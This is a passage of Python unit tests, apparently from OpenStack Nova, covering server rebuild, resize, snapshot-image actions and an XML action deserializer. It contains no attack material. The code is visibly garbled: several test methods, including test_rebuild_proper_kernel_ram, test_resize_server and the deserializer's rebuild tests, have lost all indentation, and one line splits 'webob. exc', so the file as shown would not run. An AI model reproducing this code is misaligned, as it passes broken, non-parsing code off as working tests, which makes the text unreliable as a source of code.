        body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
        self.assertNotIn('personality', body['server'])
    def test_rebuild_admin_pass(self):
        """An adminPass in the rebuild body is echoed in the response."""
        return_server = fakes.fake_instance_get(image_ref='2',
                vm_state=vm_states.ACTIVE, host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "adminPass": "asdf",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
        self.assertEqual(body['server']['image']['id'], '2')
        self.assertEqual(body['server']['adminPass'], 'asdf')
    def test_rebuild_admin_pass_pass_disabled(self):
        # run with enable_instance_password disabled to verify adminPass
        # is missing from response. See lp bug 921814
        self.flags(enable_instance_password=False)
        return_server = fakes.fake_instance_get(image_ref='2',
                vm_state=vm_states.ACTIVE, host='fake_host')
        self.stubs.Set(db, 'instance_get_by_uuid', return_server)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "adminPass": "asdf",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        body = self.controller._action_rebuild(req, FAKE_UUID, body).obj
        self.assertEqual(body['server']['image']['id'], '2')
        self.assertNotIn('adminPass', body['server'])
    def test_rebuild_server_not_found(self):
        """Rebuild on an unknown instance maps to HTTP 404."""
        def server_not_found(self, instance_id,
                             columns_to_join=None, use_slave=False):
            raise exception.InstanceNotFound(instance_id=instance_id)
        self.stubs.Set(db, 'instance_get_by_uuid', server_not_found)
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_with_bad_image(self):
        """An unresolvable imageRef is rejected with HTTP 400."""
        body = {
            "rebuild": {
                "imageRef": "foo",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
    def test_rebuild_accessIP(self):
        """Rebuild applies accessIPv4/v6 from the body and resets image_ref,
        kernel/ramdisk ids, task_state and progress on the saved instance.
        """
        attributes = {
            'access_ip_v4': '172.19.0.1',
            'access_ip_v6': 'fe80::1',
        }
        body = {
            "rebuild": {
                "imageRef": self._image_href,
                "accessIPv4": "172.19.0.1",
                "accessIPv6": "fe80::1",
            },
        }
        data = {'changes': {}}
        orig_get = compute_api.API.get
        def wrap_get(*args, **kwargs):
            # Capture the fetched instance so fake_save can read its changes.
            data['instance'] = orig_get(*args, **kwargs)
            return data['instance']
        def fake_save(context, **kwargs):
            data['changes'].update(data['instance'].obj_get_changes())
        self.stubs.Set(compute_api.API, 'get', wrap_get)
        self.stubs.Set(objects.Instance, 'save', fake_save)
        req = fakes.HTTPRequest.blank(self.url)
        self.controller._action_rebuild(req, FAKE_UUID, body)
        self.assertEqual(self._image_href, data['changes']['image_ref'])
        self.assertEqual("", data['changes']['kernel_id'])
        self.assertEqual("", data['changes']['ramdisk_id'])
        self.assertEqual(task_states.REBUILDING, data['changes']['task_state'])
        self.assertEqual(0, data['changes']['progress'])
        for attr, value in attributes.items():
            self.assertEqual(value, str(data['changes'][attr]))
    def test_rebuild_when_kernel_not_exists(self):
        """Rebuild fails with HTTP 400 when the target image references a
        kernel_id that the image service cannot find.
        """
        def return_image_meta(*args, **kwargs):
            # kernel_id 1 is deliberately absent from this table.
            image_meta_table = {
                '2': {'id': 2, 'status': 'active', 'container_format': 'ari'},
                '155d900f-4e14-4e4c-a73d-069cbf4541e6':
                    {'id': 3, 'status': 'active', 'container_format': 'raw',
                     'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
            }
            image_id = args[2]
            try:
                image_meta = image_meta_table[str(image_id)]
            except KeyError:
                raise exception.ImageNotFound(image_id=image_id)
            return image_meta
        self.stubs.Set(fake._FakeImageService, 'show', return_image_meta)
        body = {
            "rebuild": {
                "imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
def test_rebuild_proper_kernel_ram(self):
instance_meta = {'kernel_id': None, 'ramdisk_id': None}
orig_get = compute_api.API.get
def wrap_get(*args, **kwargs):
inst = orig_get(*args, **kwargs)
instance_meta['instance'] = inst
return inst
def fake_save(context, **kwargs):
instance = instance_meta['instance']
for key in instance_meta.keys():
if key in instance.obj_what_changed():
instance_meta[key] = instance[key]
def return_image_meta(*args, **kwargs):
image_meta_table = {
'1': {'id': 1, 'status': 'active', 'container_format': 'aki'},
'2': {'id': 2, 'status': 'active', 'container_format': 'ari'},
'155d900f-4e14-4e4c-a73d-069cbf4541e6':
{'id': 3, 'status': 'active', 'container_format': 'raw',
'properties': {'kernel_id': 1, 'ramdisk_id': 2}},
}
image_id = args[2]
try:
image_meta = image_meta_table[str(image_id)]
except KeyError:
raise exception.ImageNotFound(image_id=image_id)
return image_meta
self.stubs.Set(fake._FakeImageService, 'show', return_image_meta)
self.stubs.Set(compute_api.API, 'get', wrap_get)
self.stubs.Set(objects.Instance, 'save', fake_save)
body = {
"rebuild": {
"imageRef": "155d900f-4e14-4e4c-a73d-069cbf4541e6",
},
}
req = fakes.HTTPRequest.blank(self.url)
self.controller._action_rebuild(req, FAKE_UUID, body).obj
self.assertEqual(instance_meta['kernel_id'], '1')
self.assertEqual(instance_meta['ramdisk_id'], '2')
    @mock.patch.object(compute_api.API, 'rebuild')
    def test_rebuild_instance_raise_auto_disk_config_exc(self, mock_rebuild):
        """AutoDiskConfigDisabledByImage from rebuild maps to HTTP 400."""
        body = {
            "rebuild": {
                "imageRef": self._image_href,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        mock_rebuild.side_effect = exception.AutoDiskConfigDisabledByImage(
            image='dummy')
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_rebuild,
                          req, FAKE_UUID, body)
def test_resize_server(self):
body = dict(resize=dict(flavorRef="http://localhost/3"))
self.resize_called = False
def resize_mock(*args):
self.resize_called = True
self.stubs.Set(compute_api.API, 'resize', resize_mock)
req = fakes.HTTPRequest.blank(self.url)
body = self.controller._action_resize(req, FAKE_UUID, body)
self.assertEqual(self.resize_called, True)
    def test_resize_server_no_flavor(self):
        """A resize body without flavorRef is rejected with HTTP 400."""
        body = dict(resize=dict())
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_resize_server_no_flavor_ref(self):
        """A flavorRef of None is rejected with HTTP 400."""
        body = dict(resize=dict(flavorRef=None))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_resize_with_server_not_found(self):
        """Resize on an unknown instance maps to HTTP 404."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        self.stubs.Set(compute_api.API, 'get', return_server_not_found)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPNotFound,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_resize_with_image_exceptions(self):
        """Each image-related compute exception maps to the expected HTTP
        error; NoValidHost and AutoDiskConfigDisabledByImage also surface
        their message in the response explanation.
        """
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        self.resize_called = 0
        image_id = 'fake_image_id'
        # (raised compute exception, expected webob HTTP error) pairs.
        exceptions = [
            (exception.ImageNotAuthorized(image_id=image_id),
             webob.exc.HTTPUnauthorized),
            (exception.ImageNotFound(image_id=image_id),
             webob.exc.HTTPBadRequest),
            (exception.Invalid, webob.exc.HTTPBadRequest),
            (exception.NoValidHost(reason='Bad host'),
             webob.exc.HTTPBadRequest),
            (exception.AutoDiskConfigDisabledByImage(image=image_id),
             webob.exc.HTTPBadRequest),
        ]
        raised, expected = map(iter, zip(*exceptions))
        def _fake_resize(obj, context, instance, flavor_id):
            # Raise the next exception from the table on each call.
            self.resize_called += 1
            raise raised.next()
        self.stubs.Set(compute_api.API, 'resize', _fake_resize)
        for call_no in range(len(exceptions)):
            req = fakes.HTTPRequest.blank(self.url)
            next_exception = expected.next()
            actual = self.assertRaises(next_exception,
                                       self.controller._action_resize,
                                       req, FAKE_UUID, body)
            if (isinstance(exceptions[call_no][0],
                           exception.NoValidHost)):
                self.assertEqual(actual.explanation,
                                 'No valid host was found. Bad host')
            elif (isinstance(exceptions[call_no][0],
                             exception.AutoDiskConfigDisabledByImage)):
                self.assertEqual(actual.explanation,
                                 'Requested image fake_image_id has automatic'
                                 ' disk resize disabled.')
            self.assertEqual(self.resize_called, call_no + 1)
    @mock.patch('nova.compute.api.API.resize',
                side_effect=exception.CannotResizeDisk(reason=''))
    def test_resize_raises_cannot_resize_disk(self, mock_resize):
        """CannotResizeDisk from resize maps to HTTP 400."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    @mock.patch('nova.compute.api.API.resize',
                side_effect=exception.FlavorNotFound(reason='',
                                                     flavor_id='fake_id'))
    def test_resize_raises_flavor_not_found(self, mock_resize):
        """FlavorNotFound from resize maps to HTTP 400."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_resize_with_too_many_instances(self):
        """TooManyInstances (quota) from resize maps to HTTP 403."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        def fake_resize(*args, **kwargs):
            raise exception.TooManyInstances(message="TooManyInstance")
        self.stubs.Set(compute_api.API, 'resize', fake_resize)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPForbidden,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_resize_raises_conflict_on_invalid_state(self):
        """InstanceInvalidState from resize maps to HTTP 409."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        def fake_resize(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                    state='fake_state', method='fake_method',
                    instance_uuid='fake')
        self.stubs.Set(compute_api.API, 'resize', fake_resize)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    @mock.patch('nova.compute.api.API.resize',
                side_effect=exception.NoValidHost(reason=''))
    def test_resize_raises_no_valid_host(self, mock_resize):
        """NoValidHost from resize maps to HTTP 400."""
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    @mock.patch.object(compute_api.API, 'resize')
    def test_resize_instance_raise_auto_disk_config_exc(self, mock_resize):
        """AutoDiskConfigDisabledByImage from resize maps to HTTP 400."""
        mock_resize.side_effect = exception.AutoDiskConfigDisabledByImage(
            image='dummy')
        body = dict(resize=dict(flavorRef="http://localhost/3"))
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_resize,
                          req, FAKE_UUID, body)
    def test_confirm_resize_server(self):
        """confirmResize calls through to compute-api confirm_resize."""
        body = dict(confirmResize=None)
        self.confirm_resize_called = False
        def cr_mock(*args):
            self.confirm_resize_called = True
        self.stubs.Set(compute_api.API, 'confirm_resize', cr_mock)
        req = fakes.HTTPRequest.blank(self.url)
        body = self.controller._action_confirm_resize(req, FAKE_UUID, body)
        self.assertEqual(self.confirm_resize_called, True)
    def test_confirm_resize_migration_not_found(self):
        """MigrationNotFoundByStatus from confirm_resize maps to 400."""
        body = dict(confirmResize=None)
        def confirm_resize_mock(*args):
            raise exception.MigrationNotFoundByStatus(instance_id=1,
                                                      status='finished')
        self.stubs.Set(compute_api.API,
                       'confirm_resize',
                       confirm_resize_mock)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_confirm_resize,
                          req, FAKE_UUID, body)
    def test_confirm_resize_raises_conflict_on_invalid_state(self):
        """InstanceInvalidState from confirm_resize maps to HTTP 409."""
        body = dict(confirmResize=None)
        def fake_confirm_resize(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                    state='fake_state', method='fake_method',
                    instance_uuid='fake')
        self.stubs.Set(compute_api.API, 'confirm_resize',
                       fake_confirm_resize)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_confirm_resize,
                          req, FAKE_UUID, body)
    def test_revert_resize_migration_not_found(self):
        """MigrationNotFoundByStatus from revert_resize maps to 400."""
        body = dict(revertResize=None)
        def revert_resize_mock(*args):
            raise exception.MigrationNotFoundByStatus(instance_id=1,
                                                      status='finished')
        self.stubs.Set(compute_api.API,
                       'revert_resize',
                       revert_resize_mock)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_revert_resize,
                          req, FAKE_UUID, body)
def test_revert_resize_server_not_found(self):
body = dict(revertResize=None)
req = fakes.HTTPRequest.blank(self.url)
self.assertRaises(webob. exc.HTTPNotFound,
self.controller._action_revert_resize,
req, "bad_server_id", body)
    def test_revert_resize_server(self):
        """revertResize calls through to compute-api revert_resize."""
        body = dict(revertResize=None)
        self.revert_resize_called = False
        def revert_mock(*args):
            self.revert_resize_called = True
        self.stubs.Set(compute_api.API, 'revert_resize', revert_mock)
        req = fakes.HTTPRequest.blank(self.url)
        body = self.controller._action_revert_resize(req, FAKE_UUID, body)
        self.assertEqual(self.revert_resize_called, True)
    def test_revert_resize_raises_conflict_on_invalid_state(self):
        """InstanceInvalidState from revert_resize maps to HTTP 409."""
        body = dict(revertResize=None)
        def fake_revert_resize(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                    state='fake_state', method='fake_method',
                    instance_uuid='fake')
        self.stubs.Set(compute_api.API, 'revert_resize',
                       fake_revert_resize)
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_revert_resize,
                          req, FAKE_UUID, body)
    def test_create_image(self):
        """createImage returns a Location header for the new image."""
        body = {
            'createImage': {
                'name': 'Snapshot 1',
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        response = self.controller._action_create_image(req, FAKE_UUID, body)
        location = response.headers['Location']
        self.assertEqual('http://localhost/v2/fake/images/123', location)
    def test_create_image_glance_link_prefix(self):
        """osapi_glance_link_prefix overrides the Location header host."""
        self.flags(osapi_glance_link_prefix='https://glancehost')
        body = {
            'createImage': {
                'name': 'Snapshot 1',
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        response = self.controller._action_create_image(req, FAKE_UUID, body)
        location = response.headers['Location']
        self.assertEqual('https://glancehost/v2/fake/images/123', location)
    def test_create_image_name_too_long(self):
        """An image name longer than the limit maps to HTTP 400."""
        long_name = 'a' * 260
        body = {
            'createImage': {
                'name': long_name,
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_create_image, req,
                          FAKE_UUID, body)
    def _do_test_create_volume_backed_image(self, extra_properties):
        """Helper: createImage on a volume-backed instance snapshots the
        volume and produces an image whose properties carry the original
        kernel/ramdisk ids, root device name, and a v2 block device mapping
        referencing the new snapshot; extra_properties, if given, are
        merged into the image properties.
        """
        def _fake_id(x):
            # Build a deterministic uuid-shaped string from one character.
            return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
        body = dict(createImage=dict(name='snapshot_of_volume_backed'))
        if extra_properties:
            body['createImage']['metadata'] = extra_properties
        image_service = glance.get_default_image_service()
        bdm = [dict(volume_id=_fake_id('a'),
                    volume_size=1,
                    device_name='vda',
                    delete_on_termination=False)]
        props = dict(kernel_id=_fake_id('b'),
                     ramdisk_id=_fake_id('c'),
                     root_device_name='/dev/vda',
                     block_device_mapping=bdm)
        original_image = dict(properties=props,
                              container_format='ami',
                              status='active',
                              is_public=True)
        image_service.create(None, original_image)
        def fake_block_device_mapping_get_all_by_instance(context, inst_id,
                                                          use_slave=False):
            return [fake_block_device.FakeDbBlockDeviceDict(
                        {'volume_id': _fake_id('a'),
                         'source_type': 'snapshot',
                         'destination_type': 'volume',
                         'volume_size': 1,
                         'device_name': 'vda',
                         'snapshot_id': 1,
                         'boot_index': 0,
                         'delete_on_termination': False,
                         'no_device': None})]
        self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
                       fake_block_device_mapping_get_all_by_instance)
        instance = fakes.fake_instance_get(image_ref=original_image['id'],
                                           vm_state=vm_states.ACTIVE,
                                           root_device_name='/dev/vda')
        self.stubs.Set(db, 'instance_get_by_uuid', instance)
        volume = dict(id=_fake_id('a'),
                      size=1,
                      host='fake',
                      display_description='fake')
        snapshot = dict(id=_fake_id('d'))
        # mox expectations: one volume get, one forced snapshot.
        self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
        volume_api = self.controller.compute_api.volume_api
        volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
        volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
                mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
        self.mox.ReplayAll()
        req = fakes.HTTPRequest.blank(self.url)
        response = self.controller._action_create_image(req, FAKE_UUID, body)
        location = response.headers['Location']
        image_id = location.replace('http://localhost/v2/fake/images/', '')
        image = image_service.show(None, image_id)
        self.assertEqual(image['name'], 'snapshot_of_volume_backed')
        properties = image['properties']
        self.assertEqual(properties['kernel_id'], _fake_id('b'))
        self.assertEqual(properties['ramdisk_id'], _fake_id('c'))
        self.assertEqual(properties['root_device_name'], '/dev/vda')
        self.assertEqual(properties['bdm_v2'], True)
        bdms = properties['block_device_mapping']
        self.assertEqual(len(bdms), 1)
        self.assertEqual(bdms[0]['boot_index'], 0)
        self.assertEqual(bdms[0]['source_type'], 'snapshot')
        self.assertEqual(bdms[0]['destination_type'], 'volume')
        self.assertEqual(bdms[0]['snapshot_id'], snapshot['id'])
        for fld in ('connection_info', 'id',
                    'instance_uuid', 'device_name'):
            self.assertNotIn(fld, bdms[0])
        for k in extra_properties.keys():
            self.assertEqual(properties[k], extra_properties[k])
    def test_create_volume_backed_image_no_metadata(self):
        """Volume-backed snapshot with no extra metadata."""
        self._do_test_create_volume_backed_image({})
    def test_create_volume_backed_image_with_metadata(self):
        """Volume-backed snapshot with caller-supplied metadata."""
        self._do_test_create_volume_backed_image(dict(ImageType='Gold',
                                                      ImageVersion='2.0'))
    def _test_create_volume_backed_image_with_metadata_from_volume(
            self, extra_metadata=None):
        """Helper: createImage on a volume-backed instance copies the
        volume's volume_image_metadata into the new image's properties,
        merging in extra_metadata when given.
        """
        def _fake_id(x):
            # Build a deterministic uuid-shaped string from one character.
            return '%s-%s-%s-%s' % (x * 8, x * 4, x * 4, x * 12)
        body = dict(createImage=dict(name='snapshot_of_volume_backed'))
        if extra_metadata:
            body['createImage']['metadata'] = extra_metadata
        image_service = glance.get_default_image_service()
        def fake_block_device_mapping_get_all_by_instance(context, inst_id,
                                                          use_slave=False):
            return [fake_block_device.FakeDbBlockDeviceDict(
                        {'volume_id': _fake_id('a'),
                         'source_type': 'snapshot',
                         'destination_type': 'volume',
                         'volume_size': 1,
                         'device_name': 'vda',
                         'snapshot_id': 1,
                         'boot_index': 0,
                         'delete_on_termination': False,
                         'no_device': None})]
        self.stubs.Set(db, 'block_device_mapping_get_all_by_instance',
                       fake_block_device_mapping_get_all_by_instance)
        instance = fakes.fake_instance_get(image_ref='',
                                           vm_state=vm_states.ACTIVE,
                                           root_device_name='/dev/vda')
        self.stubs.Set(db, 'instance_get_by_uuid', instance)
        fake_metadata = {'test_key1': 'test_value1',
                         'test_key2': 'test_value2'}
        volume = dict(id=_fake_id('a'),
                      size=1,
                      host='fake',
                      display_description='fake',
                      volume_image_metadata=fake_metadata)
        snapshot = dict(id=_fake_id('d'))
        # mox expectations: two volume gets, one forced snapshot.
        self.mox.StubOutWithMock(self.controller.compute_api, 'volume_api')
        volume_api = self.controller.compute_api.volume_api
        volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
        volume_api.get(mox.IgnoreArg(), volume['id']).AndReturn(volume)
        volume_api.create_snapshot_force(mox.IgnoreArg(), volume['id'],
                mox.IgnoreArg(), mox.IgnoreArg()).AndReturn(snapshot)
        req = fakes.HTTPRequest.blank(self.url)
        self.mox.ReplayAll()
        response = self.controller._action_create_image(req, FAKE_UUID, body)
        location = response.headers['Location']
        image_id = location.replace('http://localhost/v2/fake/images/', '')
        image = image_service.show(None, image_id)
        properties = image['properties']
        self.assertEqual(properties['test_key1'], 'test_value1')
        self.assertEqual(properties['test_key2'], 'test_value2')
        if extra_metadata:
            for key, val in extra_metadata.items():
                self.assertEqual(properties[key], val)
    def test_create_vol_backed_img_with_meta_from_vol_without_extra_meta(self):
        """Volume metadata is copied when no extra metadata is supplied."""
        self._test_create_volume_backed_image_with_metadata_from_volume()
    def test_create_vol_backed_img_with_meta_from_vol_with_extra_meta(self):
        """Volume metadata and extra metadata are both copied."""
        self._test_create_volume_backed_image_with_metadata_from_volume(
            extra_metadata={'a': 'b'})
    def test_create_image_snapshots_disabled(self):
        """Don't permit a snapshot if the allow_instance_snapshots flag is
        False
        """
        self.flags(allow_instance_snapshots=False)
        body = {
            'createImage': {
                'name': 'Snapshot 1',
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
    def test_create_image_with_metadata(self):
        """createImage with a metadata dict succeeds."""
        body = {
            'createImage': {
                'name': 'Snapshot 1',
                'metadata': {'key': 'asdf'},
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        response = self.controller._action_create_image(req, FAKE_UUID, body)
        location = response.headers['Location']
        self.assertEqual('http://localhost/v2/fake/images/123', location)
    def test_create_image_with_too_much_metadata(self):
        """Metadata beyond quota_metadata_items maps to HTTP 403."""
        body = {
            'createImage': {
                'name': 'Snapshot 1',
                'metadata': {},
            },
        }
        for num in range(CONF.quota_metadata_items + 1):
            body['createImage']['metadata']['foo%i' % num] = "bar"
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPForbidden,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
    def test_create_image_no_name(self):
        """createImage without a name is rejected with HTTP 400."""
        body = {
            'createImage': {},
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
    def test_create_image_blank_name(self):
        """createImage with an empty name is rejected with HTTP 400."""
        body = {
            'createImage': {
                'name': '',
            }
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
    def test_create_image_bad_metadata(self):
        """Non-dict metadata is rejected with HTTP 400."""
        body = {
            'createImage': {
                'name': 'geoff',
                'metadata': 'henry',
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPBadRequest,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
    def test_create_image_raises_conflict_on_invalid_state(self):
        """InstanceInvalidState from snapshot maps to HTTP 409."""
        def snapshot(*args, **kwargs):
            raise exception.InstanceInvalidState(attr='fake_attr',
                    state='fake_state', method='fake_method',
                    instance_uuid='fake')
        self.stubs.Set(compute_api.API, 'snapshot', snapshot)
        body = {
            "createImage": {
                "name": "test_snapshot",
            },
        }
        req = fakes.HTTPRequest.blank(self.url)
        self.assertRaises(webob.exc.HTTPConflict,
                          self.controller._action_create_image,
                          req, FAKE_UUID, body)
class TestServerActionXMLDeserializer(test.TestCase):
    def setUp(self):
        """Create a fresh ActionDeserializer for each test."""
        super(TestServerActionXMLDeserializer, self).setUp()
        self.deserializer = servers.ActionDeserializer()
    def test_create_image(self):
        """A createImage element with a name attribute deserializes to the
        matching dict body.
        """
        serial_request = """
<createImage xmlns="http://docs.openstack.org/compute/api/v1.1"
             name="new-server-test"/>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "createImage": {
                "name": "new-server-test",
            },
        }
        self.assertEqual(request['body'], expected)
    def test_create_image_with_metadata(self):
        """Nested <metadata>/<meta> elements become a metadata dict."""
        serial_request = """
<createImage xmlns="http://docs.openstack.org/compute/api/v1.1"
             name="new-server-test">
    <metadata>
        <meta key="key1">value1</meta>
    </metadata>
</createImage>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "createImage": {
                "name": "new-server-test",
                "metadata": {"key1": "value1"},
            },
        }
        self.assertEqual(request['body'], expected)
    def test_change_pass(self):
        """changePassword with adminPass deserializes to the dict body."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <changePassword
                    xmlns="http://docs.openstack.org/compute/api/v1.1"
                    adminPass="1234pass"/> """
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "changePassword": {
                "adminPass": "1234pass",
            },
        }
        self.assertEqual(request['body'], expected)
    def test_change_pass_no_pass(self):
        """changePassword without adminPass raises AttributeError."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <changePassword
                    xmlns="http://docs.openstack.org/compute/api/v1.1"/> """
        self.assertRaises(AttributeError,
                          self.deserializer.deserialize,
                          serial_request,
                          'action')
    def test_change_pass_empty_pass(self):
        """An empty adminPass attribute deserializes to an empty string."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <changePassword
                    xmlns="http://docs.openstack.org/compute/api/v1.1"
                    adminPass=""/> """
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "changePassword": {
                "adminPass": "",
            },
        }
        self.assertEqual(request['body'], expected)
    def test_reboot(self):
        """A reboot element with a type attribute deserializes correctly."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <reboot
                    xmlns="http://docs.openstack.org/compute/api/v1.1"
                    type="HARD"/>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "reboot": {
                "type": "HARD",
            },
        }
        self.assertEqual(request['body'], expected)
    def test_reboot_no_type(self):
        """A reboot element without a type raises AttributeError."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <reboot
                    xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
        self.assertRaises(AttributeError,
                          self.deserializer.deserialize,
                          serial_request,
                          'action')
    def test_resize(self):
        """A resize element with flavorRef deserializes correctly."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <resize
                    xmlns="http://docs.openstack.org/compute/api/v1.1"
                    flavorRef="http://localhost/flavors/3"/>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "resize": {"flavorRef": "http://localhost/flavors/3"},
        }
        self.assertEqual(request['body'], expected)
    def test_resize_no_flavor_ref(self):
        """A resize element without flavorRef raises AttributeError."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <resize
                    xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
        self.assertRaises(AttributeError,
                          self.deserializer.deserialize,
                          serial_request,
                          'action')
    def test_confirm_resize(self):
        """An empty confirmResize element deserializes to a None value."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <confirmResize
                    xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "confirmResize": None,
        }
        self.assertEqual(request['body'], expected)
    def test_revert_resize(self):
        """An empty revertResize element deserializes to a None value."""
        serial_request = """<?xml version="1.0" encoding="UTF-8"?>
                <revertResize
                    xmlns="http://docs.openstack.org/compute/api/v1.1"/>"""
        request = self.deserializer.deserialize(serial_request, 'action')
        expected = {
            "revertResize": None,
        }
        self.assertEqual(request['body'], expected)
def test_rebuild(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test"
imageRef="http://localhost/images/1">
<metadata>
<meta key="My Server Name">Apache1</meta>
</metadata>
<personality>
<file path="/etc/banner.txt">Mg==</file>
</personality>
</rebuild>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"name": "new-server-test",
"imageRef": "http://localhost/images/1",
"metadata": {
"My Server Name": "Apache1",
},
"personality": [
{"path": "/etc/banner.txt", "contents": "Mg=="},
],
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_rebuild_minimum(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
imageRef="http://localhost/images/1"/>"""
request = self.deserializer.deserialize(serial_request, 'action')
expected = {
"rebuild": {
"imageRef": "http://localhost/images/1",
},
}
self.assertThat(request['body'], matchers.DictMatches(expected))
def test_rebuild_no_imageRef(self):
serial_request = """<?xml version="1.0" encoding="UTF-8"?>
<rebuild
xmlns="http://docs.openstack.org/compute/api/v1.1"
name="new-server-test">
<metadata>
<meta key="My Server Name">Apache1</meta>
</metadata>
<personality>
<file path="/etc/banner.txt">Mg==</file>
</personality>
</rebuild>"""
self.assertRaises(AttributeError,
self.deserializer.deserialize,
serial_request,
'action')
def test_rebuild_blank_name(self):
